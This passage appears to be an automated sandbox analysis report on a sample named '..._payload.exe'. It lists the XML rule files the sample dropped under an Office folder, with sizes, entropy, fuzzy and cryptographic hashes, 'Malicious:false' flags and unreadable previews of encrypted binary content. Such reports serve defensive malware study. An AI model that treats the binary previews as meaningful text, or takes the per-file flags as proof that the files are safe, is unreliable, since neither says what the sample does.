                                                                                                                                                                      Preview:<?xml.\.....~k..d.<...~M...\.t.@\rQzz.B..1*.....|.H.8...:,h....Wu.IY.k..PD.f......W....D2}.0....j.-r..J>...w...e.......4E...E&IFIH..D..tB..i.....xu..]....[!/W..i.).......r.P.d..RA.6.k2..e2W..Om.1.....w.B ..U...e..i/Q6..gc.pT..].......J.7..e.~...5.`...+R..t.V...PzCT..[|T[.....d.....M...;..6..{..$\.....t.[N.l.....)..}.j...r.8.@AFk.....]o.F.(v......pP.H....Z...4.w/T.j.jt....J.659......6..a83._.EwNQ!`.4s3...>XY.AR.c....o./..v..]9.bBe..I...}.}5..V..:.+..(..&...<..G...>Tu....r..t.xhV...NJ#........h.U......k60....!.3..Z(.t!.)..45.Q.....[X.H=.*-[%..c.Z6Vz7.....Z...{....R .?..\.^...V.^/4...:..'.bCW..n9.uvG.^lpx........BL....0.H....PD*.E.E..j...:.7N...O..*a.8.m.J9e&...4...UN..3...U...J.OI..q.$..`./.=...q.&.?.z).r..^p.n`.7.0..wM{.Y..#......?..J....@e.=I.....z.....|.5..W?.S..*...U>..hM!Zu..)4.})....l<j.L.....w....P....? ...w.O..8.%v4*.fc]7......~....p......_H...'.....t..h..<.Si.V$t..Eb..c..e..L.{.....,.R..b.p.M'Iy4.'..I..yn..O...e{.]...t...P...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11210v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1311
                                                                                                                                                                      Entropy (8bit):7.814684766770143
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0NhbuW+T5/P4YxEJTB02bZX9GSgHaO9i4UcDpCmkfSulQXKEbHtAVV2bD:0N4WwxEJT/bNaDYm2S1aSHKgD
                                                                                                                                                                      MD5:1855D9DF394284D953CDA0D4F3E5D393
                                                                                                                                                                      SHA1:62B6083CE5CCD34EFB49813124D6B9B0C291BFD3
                                                                                                                                                                      SHA-256:29302B35201B1348885DE6A79FB6E2B3D50818E874A73F25CF3E465C90B98D09
                                                                                                                                                                      SHA-512:719EFF164E6C08C97905FF8DC893365D70A229E2D505418B9BA462B0B959B4A082B745010E437946830D1D8CBCA86CA5BE46162306C59F18F4ADC889249C89F1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..r....3.......}...@9.@..j.....RB............ivU.r;...Ls........eI%C./wAv...w.&oR ..Z/.b4.'H.||V..v..j.8;.~.....Q.Q.Ir..k.}D5.dy.Qm..h.'..}xWg.....r.... mG[C.[..Vxu.R.VhY]...~....../.G...t-&.{...ps.#Q.e.sY.}y..R.y...M....6..v......s.nE...4.Q......F...$..Zr.!..N").H5.7.63..........3.l.. _\....m|O.}.3U^;^..)aK...^.?r.>.......!...k.1\...Y6[...x..L.4.JMW...x*..|].v..8.`.n..)..'+...#.'.!....}..:G.>.....dF......1..._^....l./<....4+.{.......%.v.Ls(>..Zh}~....<.G......aC)-..{Ib..nFf.....[..M! .z.,(.eg.....M..W.|"......%..US....8`.?.7..9B..<.-..~mz..FU.1....F.0aR-..1f.....#"<.?.i.j.E..D..'!.E..CB....C...URe..L.Q..."...Q....$.\.m...=.I......K..*;~.eCwp...C...|Ys..6....j vx./.2.7......0..p..|.9]..14).Yn.Y./.h1..r.@......p....lR.4i..i..bL.r.%....R\|..yx..K.@?.?.....M6.+.N~. ..x.A.*(.@.J..q.....,~.s......,..%..e(r..B.../P...Sg...r.....}.i......`..=1.m9..4....b...U.[..R........._tdl..DB.....!.FaY.OI^G...tSk.....6id..Z.qs..d.*S]y...Rh.....h .}.Jq.F....6.K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11264v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3172
                                                                                                                                                                      Entropy (8bit):7.944623573243002
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:BgAX/EJ2LwTImFx5oQmsWt49FLALu2HbZNRd:+FgLCBFjgt491ALn/
                                                                                                                                                                      MD5:7156F4C5FFF9BE15C6BB097BDC687169
                                                                                                                                                                      SHA1:485FCCED0C73C6C92A6550B7D0D498A781C45B05
                                                                                                                                                                      SHA-256:C4F3B05D39BA8A6E7A95CDAC1547EE911C56C9F9AFEC0D81AC015F89DDABC5EC
                                                                                                                                                                      SHA-512:55D68125A1503FB6D8DAC3EB29246C17286CFABFD5782432EC073354BACC3EAA790722050674518605A2E14DDD8FDED399B82A5472E287A5BBC68AD10CAD3CC2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....k0.`.Y:........N...t)..O..vxq@.Av5...b.$!.z..fO....&wH.Jm..V4.;.B...Aw....8B.[....^..x,...:...+V;....G.'..6.q .SFm28C(.,..7.ytnYQ..>...q....E.,.&..p......7...g`q4..i.....?...<...t.......'.tH..;.f...c....K........S..Q.w:..L....S.......Z~..t.o.A...M.+.TT.......A....._*.....1!..|.Z...........zA*.e..1a..^-MPP.|,MD..h...M.-]ck..z.........lz.k...g..T:+c2..8........%n..w.&Ya.nB.Y3`M\. ...,...I:..3..".........h....0..r...K.}.(.~eY....K.._NJ.:....[X$..F...W.JGW.9.Y0y....Z..........uq*..:U......v....s@.U.s`.......j....Us.#.Y..n..]:.....h..;....-v7.M.......0I.q.'....O.0...`.m.....q.aC.r._.......-.....F..n..h.c...yW+.j.......8....W..z.]5..*.....9..@.......}R..7W.E.GM..U.-Ir.)P...w.H...7.Y...rb.Z.7o.....N.".2Y ..#B..c.<40T,.....HF....>....[4.l..v.......@.C.q.5../rj..~(....J..e.j..p...;.. l.].U.^..C. ...Cg.....E..\....HEKa~wZA....Pr...8.p..... .....%..n...7T9..<.o(C".../(.3.UZ_...%.....8...6cM.....C:r.........-}#..Y4....>u...T'...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11265v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2096
                                                                                                                                                                      Entropy (8bit):7.899829439901587
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/bzz5ddQqkBit0W9addUK5BDE1F8mBCK1pHiq0Yj9MHD:Dz7Gi6W9a7X5lE1iGCsAqX9Mj
                                                                                                                                                                      MD5:4AAC33CF4CB677313B519F5BBC7C18A8
                                                                                                                                                                      SHA1:5BCD1C15E9B2E24EBB54BD29DAFCDACDD9AEA556
                                                                                                                                                                      SHA-256:7107243554DA07A8D41749AE0B20EB2B0B93E046B88BC0DED9DC6D8641F484F3
                                                                                                                                                                      SHA-512:DAF7F8FF549C34CEC957C4A338080DA6FF45F7D5620738E010AEDF02C2AD2ACEC38371917E9F7098E97974010190D9112973FDB06EF575231852F61B878151E1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..,..o_1..D...7.U...J.W.\...jH.3...(...(h*y.%..Q.-]..=.n.n..M....m..|.....~.....d.KShy..]...9=6G;'.........'.nJw..A...5.[i.l......a.:..M.yy...jV....0...&....b.......6=...fQF^BQ..)g|........`!.'..".I,.|V.....-5...l2...P.;.o.....V4..p.T...W..T.Q...;..Y6q..!W..P\`...b.7.!*._...S'..u|ey.....V.{x.f.X..........LZ..o.*..........Ke...))..,]...Fx[.......T3L.T.[wbe%..V4DY.Iy..R.......@.... .f...4.%..i..w....#.WE.........$w.....n...]H..G..6.,..(.V...J...,(...<..t. ...3.*...!s.......3s..T..Bl.~...'....s..x../D.H.V.v.[..3..AP13.1.+'.&......a@..h:J..u..&9.e...k]..S.4..8P....r..R8....fY..DR.yL..r..).w.....%...|<....e.......H...$B.n......XduV.d.ZHA....+..^H.c.......^.nq.I....v.....q&..7F.^..o.Q...j..|.jI..3..........-...=.l.<'....X...".y.......i.............W.@W..eg.....r#......%...'.Ax.....|.!M..eZ(....Gz."5...;o_b!\;..T....]_k.x..r..@L.Ol...Z.6...%rN.v.3.en...< S..2......M;..K6.QF7.7.L.~.`..A7:...R.\".N..S.n|.....d...*B6E..h{...Hf.....on.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11285v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7525
                                                                                                                                                                      Entropy (8bit):7.97630755185315
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:mpGq3jBERdzWEjDMcSWjqKIKXgnCQckruGC:mxVERZjjtXRgn1uGC
                                                                                                                                                                      MD5:487F0060AAA458C08E4D6EC27BB0CADC
                                                                                                                                                                      SHA1:D11C1A3319FF82A4BBFDD8DD1994EE929D875FCB
                                                                                                                                                                      SHA-256:928542451D1B620D5C3A5553985E97148AA7870A46680A07CCE4A561494143B6
                                                                                                                                                                      SHA-512:5917F174DBA4078B92FC847C79AB0041F6474C5B253FBE066F2608E0DBC46AE0A7B2D76224BED507345E308EADA1F076DA838B4BF30A3FA778BBE97A2F5C5F72
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......!...4.(#...+<.....d....aV.h.....:3(K........^.E_.P.Y..q..Nb..z.............pbLa3.......T....T..T......a.F.u....D...S...n..Q. ....f.y>.Q....m.5..v..4... ...A..V"..... ~.H..&/....3..K....#.E= ,.{|jf..?.g0..Q.-.{0..|o.n.35B...H9.m.g.,P...;#..U..!.j.Hqk..X8.<...*.|Y.G.[..D..........."..%.v..k.e...*....?...kK...o'....4M.TW.......2".|T|.<.;.Ga.......8..../.H...3..e..Ir... ....Q.V[.. )..}.Gg..q..:.5.C...o9...Z.....QHv...I..DnCm.U#...Dy..R!n...5.....>...+...}.....a>r....RK].r..o...5.{h3.0@...8.....LE..I..>..+..O..5P....e...]....*.....u.$~.-.....2^*....3q0...}T..|.....Pi..6.aY^...9.G6..E.B...ue..IA[.l...|....@.....n,K.7...e......>..Q"}eu.r....cI#..w'I..Y.w.. ..:gC.........x>m...oq..Z..K.Vo.{..:._...2.@..S..ep.FR<..d..~5."..nn....H...G32...E..v..*.....7.n...B,.*.g.!f.8.L..w~.Q....x.....Fo.n.P...:...tZ9WV.B..[T.f..?........EvL...*.g.._8......h8.1.Y.I9.X2.......O..E<./.{.~.....!..FA...Gc...3>.lu..9.l>.e5g0P.B..0.U4t.U.C.......ib'/9$.#3)..}.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11289v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4197
                                                                                                                                                                      Entropy (8bit):7.955337601406239
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:kbnm8Bt2H9smg5uLXDt1gnJR74V44y8zn1jskZ:kLmmOs15yTt1gJRkLse
                                                                                                                                                                      MD5:850A132417475B4A26A1CA57FA3BC07F
                                                                                                                                                                      SHA1:04BA63C3F8D5898EA422962A270B8027644D489F
                                                                                                                                                                      SHA-256:B411C94978CE2121EF1E4DEAA2BFE02554C7B8B5B0438DF8B18ADAD2A7D3CAA6
                                                                                                                                                                      SHA-512:24E648CA469969C86B4257F51CEC55DC04258BB425279F3BE0277E2F1430BD2C650D3983B004B9307A7D7359CA47E894B2E0AEDA39B8D2B5E549814141BF28E2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.U.[Vu.?F...8bV..{.T..`..d...)...<.Y.....i.Q'....o.....t...F...8..j........1.;.t.......7.J.!.it.\XW%.v.....M#..Y..>.,...+....&aD.z.S.3...5..4.....s..|...ro.+.....E.K......y!..?*$5....e..~.X..`.....x....Z5.OZ..L.th...of..D].gi.......o.=.no...g.F'...i.h..1b4..*....V..dP.&...<m}.&..08hGMA..."......h.=/A(?3.6....[G...5........0..=.9\.g.Rg...pMHkc.\cD..{.7....D..?....T....-.'...K.._..j.9.....Q.7..*...T..U.D:X.I....>..G.....JQ.9..%...1.l..='6....,.\...?Fg...&9....NB........(,.k ..8.X...{..}a..\.)LW...M...p..U..7...s.D.f3)"'..#Qn.A....&..s.VV..f./...K....~m...<\..IZY.T.....x....D.\..".:0..........9.~N6...X ..wS...,...!v..>.h,....5."N|L..m('..'b......I....}.-.T..+..#sU..I....|....8...~l.....:.T.e.(..%...MI.t..4.....*O_.i.h..i&..8..G. .d.~......9D......Ne.[..$I7.k7.'..e..U:..IH.`x.&...2PRj....Q._D..a.1s+..jR..L.(.f..;@EdM...:(.0.....]Xj.YR.bjP..0.bP.......W...\MC8..:..l...Js..Jm=...o...A.uB3U...xt A....o..........g./L..L.?..W../.]....d)..=

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4608
                                                                                                                                                                      Entropy (8bit):7.960708307610511
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:E2dwEUM+S56HeLFzlwvFvHq79D3YQcAqwLQzjU1qaT7Dnjbb:7dVrJfwdvHqBDdcAqwwRinT
                                                                                                                                                                      MD5:88F351E34FB2221F8E0458DA06025169
                                                                                                                                                                      SHA1:F185DC576F0097E1A8DD6480416927A24E5B093E
                                                                                                                                                                      SHA-256:241AE85C764F56466A2D98BCF715B37B110AE480461E5D5B5BCC2CE591F8D91C
                                                                                                                                                                      SHA-512:D891171D8D237899ADCEAA142C9CF668D5F2EC2025A32C51E79271E0F2047697692BE73FD1BAECBB89B19F27E04CE57B4FB17CED7E8DF5727ADF1155800663F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.t...b_IP..o. g..g........Ay.T._0...8U8/J.)..h>49.h...) O.$.D...u5E.X.SW.....PO.i.#..........\r..1.E:+.....S..oh.....b?f...jj^..Uk....!...w.$0r......] ...N....u. .^....D.{[^.#H..B<K....b.Y.fn^........ .:.....%.g/.........S~..o..6H....@.NUT..!.....n.U..x.&..5....mQK........U..%...EY..k.).......F.`g>@?....y.,..Bb.A..Y.+..Q}a..AOE.......+?.....^..&...(..zx.Kmz....S....d78&.....l...Vp....=&uI.W7Y...LA..3.. .b........h.....XE.L..E~...s..(.....;..j.g.zN..9A..*X.c$.T...e.i.=..........b...{...j...#./pT(..8...?....|..o%..T..c.. ..*?.g>.'.L..T.:V..a...y...2...'.P.@.T.`...... .@.a..V&...#.V..M....udXH.K....h%....OkA...@....=........J..l.N.P.............s.E.x.....{...vs$.o.Y.k.b..5...K,X...-....]......b...HM..}...@.[...F(.k02....8..C.S.....FV.f..I.p.B7X........I..A.hb.}.........4.$..D.......r.I..z.....?1M.2...'r...A........p........YK.^.:r$.z..iR..: .[.v.....m....n.....6.....iW#.D..0..v.[.T].$BaT.}D.SE.3dP...S....WX.....tP,h.I......`..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11302v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2884
                                                                                                                                                                      Entropy (8bit):7.926997736848619
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:rZsYbxO7NzAdvI97BFG9hw0K7+FTCyFH1vgxfXJH2noOK2uE8V5Bvzl8aD:rZsYbxNdw9bUwwFTCyFH1vg7HMK2uEo7
                                                                                                                                                                      MD5:2047A06380327BE20D0155A02578D76F
                                                                                                                                                                      SHA1:740ECD65FDB08110083FD0947B0AB18CB30F1DC9
                                                                                                                                                                      SHA-256:35EADDE67F314D11FB5E8EFCD8E44115A4B4DC02DA56E06EA224A19F11A591AA
                                                                                                                                                                      SHA-512:E0287647938DF11A7550F830F8D9B95B51F18CA2F07F0E246CBF64138BE1D3E9315106630F7B108AE041A3B98474501442FC23833B40110631823188C1CD856F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.w...B.t....To.....Y.#@U;..%$.&Wu_.Q..;.$[.D.Pq=...1g..13...<1.=..vg.#.c.^.*..^..RjG......Z..7.#....R.'..Cg.B\)..|....o.O.n.M.G.5.L.[.;..N-.@.n.#A....;O0.-.........,..daR....}..>.?g67=um......=.}..D?.%..y....e.u.2g...\;..l^).)..d..On~.k$..]..N.c[....6.I.v.m.....V..q...-..-.N#..:$.1...o.S...ek.&.<.G%..E#.<..(R..........v.......$K~..M..t...R.].=3T.F.:...AuR......cx.;....u...5.\.C..f).N[..?w..!....G...!d...~c...wN.......*.D.>.#..s@.I. .....1.....j...&.....!5....7.55...i'...!>tB......PD....5[r.t.Xo.X.H..n.M....^...0..l:3%.....<...N.GL.^.N-.!VD.}(......3m<. $.B...h[....)zI................qrR...t%.~.Z<.fU"..E..M.....0+..p.Tf.k<.....Uz.h^..:q..7.).{k.d./33..f.x...vA^{..h#{..n.-W....c...".*...L.Yi..Y....m...V...iE6Mv%v.H;..%91....P..w....X.w...d....../E..z....N...C%B&R....c.E."k.=.lz....:.+..CJ.....9v....A...iq0.....,SVL....1d..G|+[-/..[x.+.[.9....!g.......H......<r.~....[K.^.^....d.v...f.....:.~.~.'c.l.U.....ECe./~...,...8..[.Z...V...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11362v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5842
                                                                                                                                                                      Entropy (8bit):7.966199389772212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:oeFCLOHy2qlzuSM32OstDSAyeEjCEvKlG3qUwuHVkY+pEgQGfJOYwWCUOajoAqT:RHy2/Se2OaD9kjCEikAtflwBrT
                                                                                                                                                                      MD5:039830FEAAAFA5164FCE69832B96DDFE
                                                                                                                                                                      SHA1:70B159459899E33F193C9157DFF7A007304E47B3
                                                                                                                                                                      SHA-256:1EE0F5B9A40A7707810AC7A67E773816B1EF206FBD192E4CB7B0DC5FB4CB80D1
                                                                                                                                                                      SHA-512:B1245B8D179661AED66082936D5043E3B40EEA8F711F769A3D07100DEFB8B07CDC148682C7F208172E52F53AD99039D5E8F805436C0ED3C092A345EEB28BA008
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmltU!.\....g.`\.)..<...G..#.!..W.sF...|`9E]_.Ggi.%.^..e......V...G.........c.d..../..Y.B*.I#....Y.f..\.......~.[..W.o..'...$.0.9|...c...d.p.)..|g.x...9..$.KE.&........kw..pd.{.<......&.v..yr#o...,9m_...&...X....(..L(...Y%..Y......5..=B..M."..OT...E.Y.d.g57 .....|..u..$..B:/.......<.D^C)..x(.x.$..Yld4w.k.Gt;.?.>..@.>.{.....D...x..p.U....C....N.[.X..v*.nf..uAH.<...O$.W...M..rQi..M.&...,.....I...of..t....XZVg.F_'..B..)#g.f=.fpf...S>yZ....*....-}.......e..@..J_...b.....I..:G....:.?......F0.T.n..Z..A..g.:.^H.<..>q.G.x..<M...F...d0...!eL...........N...t...z.]..e.be%....DC......C..(..X.j........:./.C.....O....X.....&0'..dK..QF. ....dX!..~q.....TK9.:u..0.%>!d.Y.,.`H....?..a...q.....5.T.....{...E.....O.".V.......C.I..S.....R..m..p.0N.M$p..]1]Qme.. .3.*..z...p...."#.W...v...&..-..U.........fxOk./..<8.2.,......B*T.<...j5f.s...#$..........:..O ....e0j..g.+...:'.m..1..r..Y1Y.v.I.........................z.,.r...K..~...$x..p7R.Y.')7#........T

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11369v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2023
                                                                                                                                                                      Entropy (8bit):7.90433511034249
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5fxDTOdHx1bWGvTYWsBLIOlydK9nM1wyOM3VED:HDmHx1fvtsBkGn9M19VFQ
                                                                                                                                                                      MD5:427D859B9DB23072DA2E9D3B7105F024
                                                                                                                                                                      SHA1:B737B75C8254C82B5F0C0C0A004AF570A6C1F577
                                                                                                                                                                      SHA-256:666DB9E79FEFDA3D5EBF906EF4FFA99E857EBC645BC1E3A545861CAE3F92F0C5
                                                                                                                                                                      SHA-512:3F2291A464E0A7B1C4E38D2A2854777F1927114FD17EE979AF05ED72484A8F6E79607902161CC20E2E557BC9E9F87EAC95537752112AD138D256F6FD304E3DE7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.4).IG..B.H..9._.).HZ..T.. .H2..._..=0...(....`..N....}..*.......+.....D....e..7....M..O$........h.:..K..W.WQ..YC.......W...C. .h......|..FX.....{w>.M~.....o*.i6..".I.+.Q..t.C.t.....S...oM.\...s...a6.?c..{b./...Q.$..6..{V.I.y9Nw...v....9jGn.N....]...n!....}..HWti....o.V.q.z..C.%O..i...T.S8<.n...!.L....k..p.!..{..s....4..(0...|s<.{..5..^....).2..U...dBd........b#...K@N.e.U..-.<.HrO..~C.Wh....<|...%].Sc..........^.-..t.....~.t..H*...B...d..=`}..J:.;]..@.M^.....O...E".9....).R...2.Ek4m.F{..D@.J..N~...K.,.=&c...>4Y.D.eb.*.L_.uOv.7..d=....J.....C9.9..U.:...]..........2...%..../D?...8..vx..m.@.8.)./...#..?..,.....;R..G..^Z..Y'.}. ..D....u..u.....3.......wy.....]tbo.B....W.6..R......dq.........-............3...)...)..O4.9?.........s.J..}..|..?.......O..2Zz..^f...4p...p).....{}4.}~..pDb......3l....hp............ l!!.@.nL.......N|p..w.#.J....-i...'..NsG..tZ.}..Pj..V=-.=..{g.=G.%..|.J.$..*..#..pe....{.@.'.....]G..0Z..M.ij.5.R...".q..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11370v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1001
                                                                                                                                                                      Entropy (8bit):7.807032996599001
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:/lwaMffarKwnnveYD++4vf6TtKRljra2pQ02bD:yaMfffMGi9WYtKoHD
                                                                                                                                                                      MD5:DB1A121ED8024A0741D6D638D9949EF8
                                                                                                                                                                      SHA1:CC5978B4D119C54E3F92C6449C6EACB8E55CD7AE
                                                                                                                                                                      SHA-256:DFE4E72BD8D43A1FC431C4BF12A9D47D8ECFCC6B135DEF93A22FABE2986BA950
                                                                                                                                                                      SHA-512:0D0339C1E15AB920A0AA97C3407E2999189883DC8071668D393F7DDB20CE03B46BB578BCD3C2D09C555527255F4D1F5DE521A1219C9A81E69E0FD584CB43C7BA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...n....}4..h..4.bn.j../!..).l.o...6.O......p"a[.d.p.GH.VT}M...R..u={.<.v...#.w..."..@b1...)...O...t.wHqk..a..sZ..K....N`HLa..f........U.F.~.>.nXc&bk....CL'N=[........@..B.O..:..7..2..pc..........S.......P...0.....G..F......x.d....s.....J.n....Ki..lw...sG.G..@..2...Q.i(..Af.T...._.m9=.t.=.m$.t..!.k......yB........T....X...........pl....rBagw..1.....,.:......_. hw:.FI.?.l.8.7.9.K..(...".:.Z...v].........D..b.^.']...i.X).Hgpu...#~...f?..o...Rw....>}.._6.K.d..&f.*3-.b....Ir.3=.......+.. D.S.....N..5||.`.FV.C..n~,......<.....h..g.!e.\.Fo@]pq.....;5.3.E.OqntgQd.A.Tz.cn.S..x........UQ.]{J.q...j%..$....5..7T.h&U....1Y*{.O..B.)..A..7./6..9.H...;.[+D..w.T5.....~.Z.".a..C;V....J"....=.._.J..H!..?......*v..L....W(p...hi....C........WQf..Q.CiU.l.._...U...Ui...}.......UP..c..J......sh.(...i..7.V.E..E.jy9...p...+.M.K.l1...v....R..).V..n...D.~?Q...V.D......&oQ.(.c>.D....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11381v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2743
                                                                                                                                                                      Entropy (8bit):7.929152797474405
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2MoQh2FYoNunKObbMTraoiv9oz0JAg00t47od5NarISLRjkKu1ck3ON+DD:5VhijunKObsen975S8S9wG0ONK
                                                                                                                                                                      MD5:491DFF5981A4D8E48A1B1D22991BE0F7
                                                                                                                                                                      SHA1:A86E66555749E9E4213CD0C133818413712E71FB
                                                                                                                                                                      SHA-256:4F3BF34D1BA3E5311224C3C503AAC9502B8E0AC7833EF9BAD55A0E81E0035B8F
                                                                                                                                                                      SHA-512:3FD5FB81DFE8F7D3A4BE826C659A52033D8B8EE808CDF5F42F048EB554372EA46081060CCD46300396B5231FCB433D3B0FB3E85FF21CAA92A721DCDD4A0E0181
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlG9.M@K.[2Qd..tC...2..d-....P^k..4.fm......3*;.?..B........53jC.\."Y..'...t<"jm2.......C3..&..0D.!1.g@R...w...[...Y.&.I\.=[.%..."......sox'U.%JI...y#..G..D....Fj..).?1p.s....M....U1.h..c...B..J...g......Mv......./........I..8.`..G...(..FP.V.X....(..x...48.6RE..v$.....>yq..[... .ET]c...g..K.....9...aP.s.).+.C.o......[..@.?.i."....S.SN)..o..K.s...S-..>./V6...6S.cw...C...j.:>.....s......xC....s.....J..bV...%leT..(l..............j..LO.rs9.T......i....{..8.....9...u...571.F.f..|....@.H..G..|&...3 H...^k*..@...t(....m...1.Mm..........."...z..o......e3A..U@.?.4....(.....*..H.3D&$N...3...U...a..$..@$.C5_.:.....~n/...(.j....o.M.mX<...,..KFh...r...-.-c... ......n..Q{...e...8.%.m...gz5`.k...(.s\..K.u...h._.W.Q..M.&.}.-..h.....P..y(.:..Vq.&q5/..x.l..j.........D.{._....6..[......a...z.....?..r.6.2^..^m..;...."..09'....^.',.)..H.~`......KOIg.o.D.?.....wES.yk....y...JD.........V.....g.....Mt.5I...N..#........M.i....{D..b...~..7.~...?.F..l...$-..b

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11446v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11063
                                                                                                                                                                      Entropy (8bit):7.984022260885064
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:VBiKNQ64ieoVgRHRbu/wMecV1IZxd1zjVAJS7w5mTbMi8XDCW3y8bscn4QSbYWyI:V4+Gi2xKiQIZx3/qzEofpC8bxnvgjKk
                                                                                                                                                                      MD5:BEB2A33995AA05DD4B3E4FA4AC28FB1B
                                                                                                                                                                      SHA1:53364086AB9EA66938107AA5B142EB6B3B9C6FE3
                                                                                                                                                                      SHA-256:39B5C95E9B0DB211360AAA67087CEBB4B0AD909E76588F9ACFE3B50BD2C82765
                                                                                                                                                                      SHA-512:F7876AB558F1BE3DCAE8B3D4830919F2613FB6A08342E0C5F18CBD54E31251D55AD63E696BC7DCD8C3BBF014193FBA115B5C89FFB0062CDCA272EF32B6456FCB
                                                                                                                                                                      Malicious:false
